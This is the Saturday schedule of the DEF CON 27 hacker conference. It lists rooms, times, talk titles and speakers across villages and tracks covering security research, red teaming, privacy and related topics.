Talk/Event Schedule


Saturday


This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.

 

Saturday - 06:00


Return to Index  -  Locations Legend
Meetups - Paris - Outside at base of Eiffel Tower - DEFCON 27 4X5K run -

 

Saturday - 09:00


Return to Index  -  Locations Legend
BCV - Flamingo 3rd Floor - Laughlin III Room - (09:50-09:59) - Welcome Note
BTVW - Flamingo - 3rd Floor- Savoy Room - Introduction To Mac-centric Incident Response Tools And Techniques - crlowell
PHVW - Bally's - Indigo Tower - 26th Floor - Burp Suite Workshop - Sunny Wear, Nestor Torres
RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - SiestaTime, A Red Team Automation Tool for Generation of Long-term Implants and Infrastructure Deployment  - Alvaro Folgado

 

Saturday - 10:00


Return to Index  -  Locations Legend
AVV - Bally's Event Center - Panel – The Long Haul: The State of Aviation Security Policy - Andrea, Stefan, Pete, Renderman
BCV - Flamingo 3rd Floor - Laughlin III Room - Keynote Blockchain-Security Symbiosis: Security Enabling Blockchains; Blockchains Enabling Security - Paul Makowski
BCV - Flamingo 3rd Floor - Laughlin III Room - (10:50-11:10) - Contest Announcement
BHV - Planet Hollywood - Melrose 1-3 Rooms - Opening Words - Sam Buhrow
BHV - Planet Hollywood - Melrose 1-3 Rooms - (10:15-10:59) - Spectra - Jean Rintoul
BTVW - Flamingo - 3rd Floor- Savoy Room - cont...(09:00-12:59) - Introduction To Mac-centric Incident Response Tools And Techniques - crlowell
CLV - Flamingo 3rd Floor - Reno I Room - Build to Hack, Hack to Build - Chris Le Roy
CLV - Flamingo 3rd Floor - Reno I Room - (10:40-11:20) - Applying Pareto's Principle for Securing AWS with SCPs - Ayman Elsawah
CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Towards Usable Dining Cryptographer Networks with Howl - Tyler Kell
DC - Paris - Track 1 - Weaponizing Hypervisors to Fight and Beat Car and Medical Devices Attacks - Ali Islam, Dan Regalado (DanuX)
DC - Paris - Track 2 - Rise of the Hypebots: Scripting Streetwear - finalphoenix
DC - Paris - Track 3 - Information Security in the Public Interest - Bruce Schneier
DC - Paris - Track 4 - EDR Is Coming; Hide Yo Sh!t - Michael Leibowitz, Topher Timzen
DL - Planet Hollywood - Sunset 1 - WiFi Kraken – Scalable Wireless Monitoring - Mike Spicer
DL - Planet Hollywood - Sunset 2 - CIRCO: Cisco Implant Raspberry Controlled Operations - Emilio Couto
DL - Planet Hollywood - Sunset 3 - Cotopaxi: IoT Protocols Security Testing Toolkit - Jakub Botwicz
DL - Planet Hollywood - Sunset 4 - Srujan: Safer Networks for Smart Homes - Sanket Karpe, Parmanand Mishra
DL - Planet Hollywood - Sunset 5 - Go Reverse Engineering Tool Kit - Joakim Kennedy
DL - Planet Hollywood - Sunset 6 - Memhunter - Automated hunting of memory resident malware at scale - Marcos Oviedo
ETV - Flamingo - 3rd Floor - Reno II Room - Void If Removed: Securing Our Right TO Repair -
PHVT - Bally's - Indigo Tower - 26th Floor - Hacking Corporate Org Socialization: One Day You Are Out and the Next Day You Pwn the Org! - D9
PHVW - Bally's - Indigo Tower - 26th Floor - cont...(09:00-10:59) - Burp Suite Workshop - Sunny Wear, Nestor Torres
RCV - Planet Hollywood - Celebrity 5 Ballroom - Hack to Basics – Adapting Exploit Frameworks to Evade Microsoft ATP - Anthony “C01И” Rose and Jake “Hubble” Krasnov
RCV - Planet Hollywood - Celebrity 5 Ballroom - (10:50-11:30) - DECEPTICON: OPSEC to Slow the OSINT - Joe Gray
RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - (10:30-11:30) - Breaking NBAD and UEBA Detection  - Charles Herring
WS - Flamingo - Lower Level - Lake Mead I - Mind the Gap Between Attacking Windows and Mac: Breaking In and Out of Protected MacOS environments - Richard Gold
WS - Flamingo - Lower Level - Lake Mead II - Writing custom backdoor payloads using C# - Mauricio Velazco, Olindo Verrillo
WS - Flamingo - Lower Level - Valley of Fire I - Red Teaming Techniques for Electronic Physical Security Systems - Valerie Thomas, Terry Gold
WS - Flamingo - Lower Level - Valley of Fire II - Functional Programming for the Blue Team - eigentourist

 

Saturday - 11:00


Return to Index  -  Locations Legend
AVV - Bally's Event Center - A hackers first solo: airplane avionics security 101 - Ken, Alex
BCV - Flamingo 3rd Floor - Laughlin III Room - cont...(10:50-11:10) - Contest Announcement
BCV - Flamingo 3rd Floor - Laughlin III Room - FumbleChain: A Purposefully Vulnerable Blockchai - Nils Amiet
BCV - Flamingo 3rd Floor - Laughlin III Room - (11:35-11:59) - Securing the Unknown: A Methodology for Auditing Smart Contracts - Ben
BHV - Planet Hollywood - Melrose 1-3 Rooms - DIY Medicine - Alex Pearlman
BHV - Planet Hollywood - Melrose 1-3 Rooms - (11:45-12:30) - Forensic Science and Information Security - Najla Lindsay
BTVW - Flamingo - 3rd Floor- Savoy Room - cont...(09:00-12:59) - Introduction To Mac-centric Incident Response Tools And Techniques - crlowell
CLV - Flamingo 3rd Floor - Reno I Room - cont...(10:40-11:20) - Applying Pareto's Principle for Securing AWS with SCPs - Ayman Elsawah
CLV - Flamingo 3rd Floor - Reno I Room - (11:20-11:45) - Lightening Talk (TBA)
CLV - Flamingo 3rd Floor - Reno I Room - (11:45-12:15) - PacBot - Policy as Code from T-Mobile OSS - Setu Parimi
CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - TLS decryption attacks and back-doors to secure systems - Chris Hanlon
DC - Paris - Track 1 - Your Car is My Car - Jmaxxz
DC - Paris - Track 2 - HAKC THE POLICE - Bill Swearingen
DC - Paris - Track 3 - Hacking Your Thoughts - Batman Forever meets Black Mirror - Katherine Pratt/GattaKat
DC - Paris - Track 4 - Meticulously Modern Mobile Manipulations - Leon Jacobs
DL - Planet Hollywood - Sunset 1 - cont...(10:00 - 11:50) - WiFi Kraken – Scalable Wireless Monitoring - Mike Spicer
DL - Planet Hollywood - Sunset 2 - cont...(10:00 - 11:50) - CIRCO: Cisco Implant Raspberry Controlled Operations - Emilio Couto
DL - Planet Hollywood - Sunset 3 - cont...(10:00 - 11:50) - Cotopaxi: IoT Protocols Security Testing Toolkit - Jakub Botwicz
DL - Planet Hollywood - Sunset 4 - cont...(10:00 - 11:50) - Srujan: Safer Networks for Smart Homes - Sanket Karpe, Parmanand Mishra
DL - Planet Hollywood - Sunset 5 - cont...(10:00 - 11:50) - Go Reverse Engineering Tool Kit - Joakim Kennedy
DL - Planet Hollywood - Sunset 6 - cont...(10:00 - 11:50) - Memhunter - Automated hunting of memory resident malware at scale - Marcos Oviedo
LBV - Flamingo - Carson City II Room - Lock Bypass 101
Meetups - Planet Hollywood - Mezzanine Stage - dstruction -
PHVT - Bally's - Indigo Tower - 26th Floor - Solving Crimes with Wireless GeoFencing and Multi-Zone Correlation Analytics - Gleb Esman
PHVW - Bally's - Indigo Tower - 26th Floor - (11:20-13:20) - Tools? We Don’t Need No Stinkin’ Tools: Hands-on Hacking with Python - Jason Nickola, Wayne Marsh
RCV - Planet Hollywood - Celebrity 5 Ballroom - cont...(10:50-11:30) - DECEPTICON: OPSEC to Slow the OSINT - Joe Gray
RCV - Planet Hollywood - Celebrity 5 Ballroom - (11:30-11:55) - Finding the needle in the twitter haystack. - Wicked Clown
RCV - Planet Hollywood - Celebrity 5 Ballroom - (11:55-12:30) - Use Responsibly: Recon Like an insider threat for Best User Training ROI - Kala Kinyon
RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - cont...(10:30-11:30) - Breaking NBAD and UEBA Detection  - Charles Herring
WS - Flamingo - Lower Level - Lake Mead I - cont...(10:00-13:59) - Mind the Gap Between Attacking Windows and Mac: Breaking In and Out of Protected MacOS environments - Richard Gold
WS - Flamingo - Lower Level - Lake Mead II - cont...(10:00-13:59) - Writing custom backdoor payloads using C# - Mauricio Velazco, Olindo Verrillo
WS - Flamingo - Lower Level - Valley of Fire I - cont...(10:00-13:59) - Red Teaming Techniques for Electronic Physical Security Systems - Valerie Thomas, Terry Gold
WS - Flamingo - Lower Level - Valley of Fire II - cont...(10:00-13:59) - Functional Programming for the Blue Team - eigentourist

 

Saturday - 12:00


Return to Index  -  Locations Legend
BCV - Flamingo 3rd Floor - Laughlin III Room - Secrets Worlds in Plain Web. The BlockChain DNS. - Fernando Amatte
BCV - Flamingo 3rd Floor - Laughlin III Room - (12:50-13:40) - Jump-Oriented Programming (JOP) in Smart Contract Honeypots - Xiaohang Yu
BHV - Planet Hollywood - Melrose 1-3 Rooms - cont...(11:45-12:30) - Forensic Science and Information Security - Najla Lindsay
BHV - Planet Hollywood - Melrose 1-3 Rooms - (12:30-14:30) - Dr/Hacker Panel - Najla Lindsay
BTVW - Flamingo - 3rd Floor- Savoy Room - cont...(09:00-12:59) - Introduction To Mac-centric Incident Response Tools And Techniques - crlowell
CLV - Flamingo 3rd Floor - Reno I Room - cont...(11:45-12:15) - PacBot - Policy as Code from T-Mobile OSS - Setu Parimi
CLV - Flamingo 3rd Floor - Reno I Room - (12:15-12:59) - Hacking into automotive clouds - Rotem Bar
CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Stop right now! Quantum-Safe Instantaneous Vehicle to Vehicle communication - Sarah McCarthy
CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Scrubber: An open source compilation to protect journalistic sources - Ethan Gregory Dodge
DC - Paris - Track 1 - How You Can Buy AT&T, T-Mobile, and Sprint Real-Time Location Data on the Black Market - Joseph Cox
DC - Paris - Track 2 - Defeating Bluetooth Low Energy 5 PRNG for Fun and Jamming - Damien Cauquil (virtualabs)
DC - Paris - Track 3 - Why You Should Fear Your “mundane” Office Equipment - Daniel Romero, Mario Rivas
DC - Paris - Track 4 - Zombie Ant Farm: Practical Tips for Playing Hide and Seek with Linux EDRs - Dimitry Snezhkov
DL - Planet Hollywood - Sunset 1 - Burp Plugin: Cyber Security Transformation Chef (CSTC) - Ralf Almon, Sebastian Puttkammer
DL - Planet Hollywood - Sunset 2 - ioc2rpz - Vadim Pavlov
DL - Planet Hollywood - Sunset 3 - Local Sheriff - Konark Modi
DL - Planet Hollywood - Sunset 4 - PCILeech and MemProcFS - Ulf Frisk, Ian Vitek
DL - Planet Hollywood - Sunset 5 - Dr.ROBOT: Organized Chaos and the Shotgun Approach - Aleksandar Straumann, Jayson Grace
DL - Planet Hollywood - Sunset 6 - bedr - Mark Ignacio
ETV - Flamingo - 3rd Floor - Reno II Room - Is It Ethical To Work On Autonomous Weapon Systems? -
ICS - Bally's Event Center - Hack the World & Galaxy with OSINT - Chris Kubecka
ICS - Bally's Event Center - (12:30-12:59) - SCADA: What the next Stuxnet will look like and how to prevent it - Joseph Bingham
Meetups - Planet Hollywood - Mezzanine Stage - cont...(11:00-12:59) - dstruction -
Meetups - Planet Hollywood - Santa Monica 4 Room - Friends of Bill W. -
PHVT - Bally's - Indigo Tower - 26th Floor - "First-Try" DNS Cache Poisoning with IPv4 and IPv6 Fragmentation - Travis Palmer and Brian Somers
PHVW - Bally's - Indigo Tower - 26th Floor - cont...(11:20-13:20) - Tools? We Don’t Need No Stinkin’ Tools: Hands-on Hacking with Python - Jason Nickola, Wayne Marsh
RCV - Planet Hollywood - Celebrity 5 Ballroom - cont...(11:55-12:30) - Use Responsibly: Recon Like an insider threat for Best User Training ROI - Kala Kinyon
RCV - Planet Hollywood - Celebrity 5 Ballroom - (12:30-13:05) - “Can you add a conference line, please?” - Using Cloud Services for Dial-In Reconnaissance Automation - Alina Dorina
WS - Flamingo - Lower Level - Lake Mead I - cont...(10:00-13:59) - Mind the Gap Between Attacking Windows and Mac: Breaking In and Out of Protected MacOS environments - Richard Gold
WS - Flamingo - Lower Level - Lake Mead II - cont...(10:00-13:59) - Writing custom backdoor payloads using C# - Mauricio Velazco, Olindo Verrillo
WS - Flamingo - Lower Level - Valley of Fire I - cont...(10:00-13:59) - Red Teaming Techniques for Electronic Physical Security Systems - Valerie Thomas, Terry Gold
WS - Flamingo - Lower Level - Valley of Fire II - cont...(10:00-13:59) - Functional Programming for the Blue Team - eigentourist

 

Saturday - 13:00


Return to Index  -  Locations Legend
BCV - Flamingo 3rd Floor - Laughlin III Room - cont...(12:50-13:40) - Jump-Oriented Programming (JOP) in Smart Contract Honeypots - Xiaohang Yu
BCV - Flamingo 3rd Floor - Laughlin III Room - (13:40-14:05) - Low-Hanging Fruits in Blockchain Security - Pavlo Radchuk&Serhii Okhrimenko
BHV - Planet Hollywood - Melrose 1-3 Rooms - cont...(12:30-14:30) - Dr/Hacker Panel - Najla Lindsay
BTVT - Flamingo - 3rd Floor- Savoy Room - Security Strategy for Small-Medium Business
CLV - Flamingo 3rd Floor - Reno I Room - DYI Azure Security Assessment - Tanya Janca & Teri Radichel
CLV - Flamingo 3rd Floor - Reno I Room - (13:45-14:25) - Using Splunk for Auditing AWS/GCP/Azure Security posture - Rod Soto
CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Tiplines Today - Harlo Holmes
DC - Paris - Track 1 - RACE - Minimal Rights and ACE for Active Directory Dominance - Nikhil Mittal
DC - Paris - Track 2 - GSM: We Can Hear Everyone Now! - Campbell Murray, Eoin Buckley, James Kulikowski
DC - Paris - Track 3 - Tag-side attacks against NFC - Christopher Wade
DC - Paris - Track 4 - SSO Wars: The Token Menace - Alvaro Muñoz, Oleksandr Mirosh
DL - Planet Hollywood - Sunset 1 - cont...(12:00 - 13:50) - Burp Plugin: Cyber Security Transformation Chef (CSTC) - Ralf Almon, Sebastian Puttkammer
DL - Planet Hollywood - Sunset 2 - cont...(12:00 - 13:50) - ioc2rpz - Vadim Pavlov
DL - Planet Hollywood - Sunset 3 - cont...(12:00 - 13:50) - Local Sheriff - Konark Modi
DL - Planet Hollywood - Sunset 4 - cont...(12:00 - 13:50) - PCILeech and MemProcFS - Ulf Frisk, Ian Vitek
DL - Planet Hollywood - Sunset 5 - cont...(12:00 - 13:50) - Dr.ROBOT: Organized Chaos and the Shotgun Approach - Aleksandar Straumann, Jayson Grace
DL - Planet Hollywood - Sunset 6 - cont...(12:00 - 13:50) - bedr - Mark Ignacio
ICS - Bally's Event Center - HVACking: Understand the difference Between Security and Reality! - Douglas McKee, Mark Bereza
ICS - Bally's Event Center - (13:30-13:59) - CRASHOVERRIDE: Re-Assessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack - Joe Slowik
Meetups - Bally's - Chillout room near Vendor Area - DEFCON Sticker Swap -
Meetups - Planet Hollywood - Mezzanine Stage - Beard and Mustache Contest
PHVT - Bally's - Indigo Tower - 26th Floor - Phishing Freakonomics - Russell Butturini
PHVW - Bally's - Indigo Tower - 26th Floor - cont...(11:20-13:20) - Tools? We Don’t Need No Stinkin’ Tools: Hands-on Hacking with Python - Jason Nickola, Wayne Marsh
PHVW - Bally's - Indigo Tower - 26th Floor - (13:40-15:40) - Writing Wireshark Plugins for Security Analysis - Nishant Sharma, Jeswin Mathai
RCV - Planet Hollywood - Celebrity 5 Ballroom - cont...(12:30-13:05) - “Can you add a conference line, please?” - Using Cloud Services for Dial-In Reconnaissance Automation - Alina Dorina
RCV - Planet Hollywood - Celebrity 5 Ballroom - Manhunting 101 - OSINT Crash Course vs Human Targets - Jason Edison
RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - BadSalt (Adversarial DevOps)  - Casey Erdmann
WS - Flamingo - Lower Level - Lake Mead I - cont...(10:00-13:59) - Mind the Gap Between Attacking Windows and Mac: Breaking In and Out of Protected MacOS environments - Richard Gold
WS - Flamingo - Lower Level - Lake Mead II - cont...(10:00-13:59) - Writing custom backdoor payloads using C# - Mauricio Velazco, Olindo Verrillo
WS - Flamingo - Lower Level - Valley of Fire I - cont...(10:00-13:59) - Red Teaming Techniques for Electronic Physical Security Systems - Valerie Thomas, Terry Gold
WS - Flamingo - Lower Level - Valley of Fire II - cont...(10:00-13:59) - Functional Programming for the Blue Team - eigentourist

 

Saturday - 14:00


Return to Index  -  Locations Legend
BCV - Flamingo 3rd Floor - Laughlin III Room - cont...(13:40-14:05) - Low-Hanging Fruits in Blockchain Security - Pavlo Radchuk&Serhii Okhrimenko
BCV - Flamingo 3rd Floor - Laughlin III Room - (14:15-15:59) - Take back control of user data with the decentralized cloud - Kevin Leffew
BHV - Planet Hollywood - Melrose 1-3 Rooms - cont...(12:30-14:30) - Dr/Hacker Panel - Najla Lindsay
BHV - Planet Hollywood - Melrose 1-3 Rooms - (14:30-15:15) - The L33T Shall Inherit the Cosmos - J.J. Hastings
BTVT - Flamingo - 3rd Floor- Savoy Room - Anatomy Of A Megabreach: Equifax Report - uncl3dumby
CLV - Flamingo 3rd Floor - Reno I Room - cont...(13:45-14:25) - Using Splunk for Auditing AWS/GCP/Azure Security posture - Rod Soto
CLV - Flamingo 3rd Floor - Reno I Room - (14:25-15:05) - Scaling Security in the Cloud With Open Source - James Strassburg
CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Adversarial Fashion – Sartorial Hacking to Combat Surveillance - Kate Rose
DC - Paris - Track 1 - SELECT code_execution FROM * USING SQLite;—Gaining code execution using a malicious SQLite database - Omer Gull
DC - Paris - Track 2 - I'm on your phone, listening - Attacking VoIP Configuration Interfaces - Stephan Huber, Philipp Roskosch
DC - Paris - Track 3 - Zero bugs found? Hold my Beer AFL! How To Improve Coverage-Guided Fuzzing and Find New 0days in Tough Targets - Maksim Shudrak
DC - Paris - Track 4 - Next Generation Process Emulation with Binee - Kyle Gwinnup, John Holowczak
DL - Planet Hollywood - Sunset 1 - Burpsuite Team Server for Collaborative Web App Testing - Tanner Barnes
DL - Planet Hollywood - Sunset 2 - OWASP Amass - Jeff Foley, Anthony Rhodes
DL - Planet Hollywood - Sunset 3 - PivotSuite: Hack The Hidden Network - A Network Pivoting Toolkit - Manish Gupta
DL - Planet Hollywood - Sunset 4 - SILENTTRINITY - Marcello Salvati
DL - Planet Hollywood - Sunset 5 - Shellcode Compiler - Ionut Popescu
DL - Planet Hollywood - Sunset 6 - Shadow Workers: Backdooring with Service Workers - Emmanuel Law, Claudio Contin
ETV - Flamingo - 3rd Floor - Reno II Room - Ethical Issues In Cyber Attribution -
ICS - Bally's Event Center - Abusing the IoT in Smart Buildings - Daniel dos Santos
Meetups - Bally's - Chillout room near Vendor Area - cont...(13:00-14:59) - DEFCON Sticker Swap -
Meetups - Planet Hollywood - Mezzanine Stage - cont...(13:00-14:59) - Beard and Mustache Contest
PHVT - Bally's - Indigo Tower - 26th Floor - (14:30-14:59) - Security to Make the CFO Happy - Adam
PHVW - Bally's - Indigo Tower - 26th Floor - cont...(13:40-15:40) - Writing Wireshark Plugins for Security Analysis - Nishant Sharma, Jeswin Mathai
RCV - Planet Hollywood - Celebrity 5 Ballroom - cont...(13:05-15:10) - Manhunting 101 - OSINT Crash Course vs Human Targets - Jason Edison
RGV - Flamingo - 3rd Floor - Carson City II - A Life of Advantage Play - R.X. Gambler
RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - (14:30-15:30) - Red Team Framework (RTF)   - Joe Gray
WS - Flamingo - Lower Level - Lake Mead I - (14:30-18:30) - scapy_dojo_v_1 - Hugo Trovao, Rushikesh D. Nandedkar
WS - Flamingo - Lower Level - Lake Mead II - (14:30-18:30) - Modern Debugging^HWarfare with WinDbg Preview - Chris Alladoum, Axel Souchet
WS - Flamingo - Lower Level - Valley of Fire I - (14:30-18:30) - Hack to Basics - x86 Windows Based Buffer Overflows, an introduction to buffer overflows. - Dino Covotsos
WS - Flamingo - Lower Level - Valley of Fire II - (14:30-18:30) - Pentesting ICS 102 - Alexandrine Torrents, Arnaud Soullié

 

Saturday - 15:00


Return to Index  -  Locations Legend
BCV - Flamingo 3rd Floor - Laughlin III Room - cont...(14:15-15:59) - Take back control of user data with the decentralized cloud - Kevin Leffew
BHV - Planet Hollywood - Melrose 1-3 Rooms - cont...(14:30-15:15) - The L33T Shall Inherit the Cosmos - J.J. Hastings
BHV - Planet Hollywood - Melrose 1-3 Rooms - (15:15-15:59) - The Story of SICGRL Vulnerability - Andrea Downing
BTVT - Flamingo - 3rd Floor- Savoy Room - Memhunter - Automated Hunting Of Memory Resident Malware At Scale - marcosd4h , chgaray
CLV - Flamingo 3rd Floor - Reno I Room - cont...(14:25-15:05) - Scaling Security in the Cloud With Open Source - James Strassburg
CLV - Flamingo 3rd Floor - Reno I Room - Your Blacklist is Dead: Why the Future of Command and Control is the Cloud - Erick Galinkin
CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - I am Spartacus! (And You Can Be Too!) Ensuring Privacy through Obfuscation - Mike Kiser
DC - Paris - Track 1 - Get off the Kernel if you can’t Drive - Jesse Michael, Mickey Shkatov
DC - Paris - Track 2 - Reverse-Engineering 4g Hotspots for Fun, Bugs and Net Financial Loss - g richter
DC - Paris - Track 3 - State of DNS Rebinding - Attack & Prevention Techniques and the Singularity of Origin - Gerald Doussot, Roger Meyer
DC - Paris - Track 4 - .NET Malware Threats: Internals And Reversing - Alexandre Borges
DL - Planet Hollywood - Sunset 1 - cont...(14:00 - 15:50) - Burpsuite Team Server for Collaborative Web App Testing - Tanner Barnes
DL - Planet Hollywood - Sunset 2 - cont...(14:00 - 15:50) - OWASP Amass - Jeff Foley, Anthony Rhodes
DL - Planet Hollywood - Sunset 3 - cont...(14:00 - 15:50) - PivotSuite: Hack The Hidden Network - A Network Pivoting Toolkit - Manish Gupta
DL - Planet Hollywood - Sunset 4 - cont...(14:00 - 15:50) - SILENTTRINITY - Marcello Salvati
DL - Planet Hollywood - Sunset 5 - cont...(14:00 - 15:50) - Shellcode Compiler - Ionut Popescu
DL - Planet Hollywood - Sunset 6 - cont...(14:00 - 15:50) - Shadow Workers: Backdooring with Service Workers - Emmanuel Law, Claudio Contin
LBV - Flamingo - Carson City II Room - Lock Bypass 101
Meetups - Planet Hollywood - Mezzanine Stage - Homebrew Hardware Contest -
PHVT - Bally's - Indigo Tower - 26th Floor - Generating Personalized Wordlists With NLP by Analyzing Tweets - Utku Sen
PHVT - Bally's - Indigo Tower - 26th Floor - (15:30-15:59) - Sandbox Creative Usage For Fun and Pro...Blems - Cesare Pizzi
PHVW - Bally's - Indigo Tower - 26th Floor - cont...(13:40-15:40) - Writing Wireshark Plugins for Security Analysis - Nishant Sharma, Jeswin Mathai
RCV - Planet Hollywood - Celebrity 5 Ballroom - cont...(13:05-15:10) - Manhunting 101 - OSINT Crash Course vs Human Targets - Jason Edison
RCV - Planet Hollywood - Celebrity 5 Ballroom - Derevolutionizing OS Fingerprinting: the cat and mouse game - Jaime Sanchez
RCV - Planet Hollywood - Celebrity 5 Ballroom - (15:50-16:15) - From email address to phone number - Martin Vigo
RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - cont...(14:30-15:30) - Red Team Framework (RTF)   - Joe Gray
SEV - Bally's Jubilee Tower - 3rd Floor - (15:30-16:20) - I PWN thee, I PWN thee not! - Jayson Street
WS - Flamingo - Lower Level - Lake Mead I - cont...(14:30-18:30) - scapy_dojo_v_1 - Hugo Trovao, Rushikesh D. Nandedkar
WS - Flamingo - Lower Level - Lake Mead II - cont...(14:30-18:30) - Modern Debugging^HWarfare with WinDbg Preview - Chris Alladoum, Axel Souchet
WS - Flamingo - Lower Level - Valley of Fire I - cont...(14:30-18:30) - Hack to Basics - x86 Windows Based Buffer Overflows, an introduction to buffer overflows. - Dino Covotsos
WS - Flamingo - Lower Level - Valley of Fire II - cont...(14:30-18:30) - Pentesting ICS 102 - Alexandrine Torrents, Arnaud Soullié

 

Saturday - 16:00


Return to Index  -  Locations Legend
BCV - Flamingo 3rd Floor - Laughlin III Room - --Workshop --
BHV - Planet Hollywood - Melrose 1-3 Rooms - Cyberbiosecurity & the "Full Stack Biotechnologist" - Steve Lewis
BHV - Planet Hollywood - Melrose 1-3 Rooms - (16:45-17:30) - Building a New Decentralized Internet, With the Nodes Implanted in Our Bodies - Nick Titus, Zac Shannon, Mixl S. Laufer
BTVT - Flamingo - 3rd Floor- Savoy Room - (16:30-16:59) - When A Plan Comes Together: Building A SOC A-Team - markaorlando
CLV - Flamingo 3rd Floor - Reno I Room - MozDef - Andrew Krug
CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Stop Facebook From Buying Your Brain: Facial Recognition, DNA, and Biometric Privacy - Tiffany Li
CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Easy PAKE Oven - Steve Thomas
DC - Paris - Track 1 - Reverse Engineering 17+ Cars in Less Than 10 Minutes - Brent Stone
DC - Paris - Track 1 - (16:30-16:50) - Unpacking Pkgs: A Look Inside Macos Installer Packages And Common Security Flaws - Andy Grant
DC - Paris - Track 2 - NOC NOC. Who's there? All. All who? All the things you wanted to know about the DEF CON NOC and we won't tell you about - The DEF CON NOC
DC - Paris - Track 3 - Confessions of an Nespresso Money Mule: Free Stuff & Triangulation Fraud - Nina Kollars, Kitty Hegemon
DC - Paris - Track 3 - (16:30-16:50) - Go NULL Yourself or: How I Learned to Start Worrying While Getting Fined for Other’s Auto Infractions - droogie
DC - Paris - Track 4 - Vacuum Cleaning Security—Pinky and the Brain Edition - jiska, clou (Fabian Ullrich)
DC - Paris - Track 4 - (16:30-16:50) - Apache Solr Injection - Michael Stepankin
ETV - Flamingo - 3rd Floor - Reno II Room - National Collegiate Penetration Testing Competition & Ethical Challenges -
Meetups - Planet Hollywood - Mezzanine Stage - cont...(15:00-16:59) - Homebrew Hardware Contest -
PHVT - Bally's - Indigo Tower - 26th Floor - (Re)Thinking Security Given the Spectre of a Meltdown (hold my beer) - Jeff Man
PHVW - Bally's - Indigo Tower - 26th Floor - Advanced APT Hunting with Splunk - John Stoner, Ryan Kovar
RCV - Planet Hollywood - Celebrity 5 Ballroom - cont...(15:50-16:15) - From email address to phone number - Martin Vigo
RCV - Planet Hollywood - Celebrity 5 Ballroom - (16:15-16:59) - PIE - A hardware based Prebellico Intelligence Exfiltration Botnet - William Suthers
RGV - Flamingo - 3rd Floor - Carson City II - Verbal Steganography - Four Suites Co.
RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - Through the Looking Glass: Own the Data Center  - Chris McCoy
SEV - Bally's Jubilee Tower - 3rd Floor - cont...(15:30-16:20) - I PWN thee, I PWN thee not! - Jayson Street
SEV - Bally's Jubilee Tower - 3rd Floor - (16:30-16:59) - Getting Psychic: Cold Reading Techniques for Fortune Tellers and Social Engineers - Chris Kirsch
WS - Flamingo - Lower Level - Lake Mead I - cont...(14:30-18:30) - scapy_dojo_v_1 - Hugo Trovao, Rushikesh D. Nandedkar
WS - Flamingo - Lower Level - Lake Mead II - cont...(14:30-18:30) - Modern Debugging^HWarfare with WinDbg Preview - Chris Alladoum, Axel Souchet
WS - Flamingo - Lower Level - Valley of Fire I - cont...(14:30-18:30) - Hack to Basics - x86 Windows Based Buffer Overflows, an introduction to buffer overflows. - Dino Covotsos
WS - Flamingo - Lower Level - Valley of Fire II - cont...(14:30-18:30) - Pentesting ICS 102 - Alexandrine Torrents, Arnaud Soullié

 

Saturday - 17:00


Return to Index  -  Locations Legend
BCV - Flamingo 3rd Floor - Laughlin III Room - cont...(16:10-17:59) - --Workshop --
BHV - Planet Hollywood - Melrose 1-3 Rooms - cont...(16:45-17:30) - Building a New Decentralized Internet, With the Nodes Implanted in Our Bodies - Nick Titus, Zac Shannon, Mixl S. Laufer
BHV - Planet Hollywood - Melrose 1-3 Rooms - (17:30-18:15) - Liven Up - Rachel Smith
BTVT - Flamingo - 3rd Floor- Savoy Room - Extending Zeek For ICS Defense - v4tl4, jamesdickenson
BTVT - Flamingo - 3rd Floor- Savoy Room - (17:30-17:59) - Killsuit - How The Equation Group Remained Out Of Sight For Years - connormorley, laciefan
CLV - Flamingo 3rd Floor - Reno I Room - cont...(16:00-17:59) - MozDef - Andrew Krug
CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Snoop all Telegram messages - Vitor Ventura
DC - Paris - Track 2 - cont...(16:00-17:45) - NOC NOC. Who's there? All. All who? All the things you wanted to know about the DEF CON NOC and we won't tell you about - The DEF CON NOC
Meetups - Planet Hollywood - Mezzanine Stage - Tinfoil Hat Contest -
Meetups - Planet Hollywood - Santa Monica 4 Room - Friends of Bill W. -
PHVT - Bally's - Indigo Tower - 26th Floor - State Sponsored Hacking: How to Intercept/Decrypt TLS Traffic and How to Prevent TLS Interception Attacks - Chris Hanlon
PHVW - Bally's - Indigo Tower - 26th Floor - cont...(16:00-17:59) - Advanced APT Hunting with Splunk - John Stoner, Ryan Kovar
RGV - Flamingo - 3rd Floor - Carson City II - Verbal Steganography Workshop - Four Suites Co.
RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - (17:30-18:30) - Casting with the Pros: Tips and Tricks for Effective Phishing - Nathan Sweaney
SEV - Bally's Jubilee Tower - 3rd Floor - Hacking Your Career Through Social Engineering - Rabecca Long
SEV - Bally's Jubilee Tower - 3rd Floor - (17:40-18:09) - Red Teaming - DON'T MISS THIS ONE - Wayne Ronaldson
WS - Flamingo - Lower Level - Lake Mead I - cont...(14:30-18:30) - scapy_dojo_v_1 - Hugo Trovao, Rushikesh D. Nandedkar
WS - Flamingo - Lower Level - Lake Mead II - cont...(14:30-18:30) - Modern Debugging^HWarfare with WinDbg Preview - Chris Alladoum, Axel Souchet
WS - Flamingo - Lower Level - Valley of Fire I - cont...(14:30-18:30) - Hack to Basics - x86 Windows Based Buffer Overflows, an introduction to buffer overflows. - Dino Covotsos
WS - Flamingo - Lower Level - Valley of Fire II - cont...(14:30-18:30) - Pentesting ICS 102 - Alexandrine Torrents, Arnaud Soullié

 

Saturday - 18:00


Return to Index  -  Locations Legend
BCV - Flamingo 3rd Floor - Laughlin III Room - Contest Roundup
BCV - Flamingo 3rd Floor - Laughlin III Room - (18:20-18:30) - Closing note
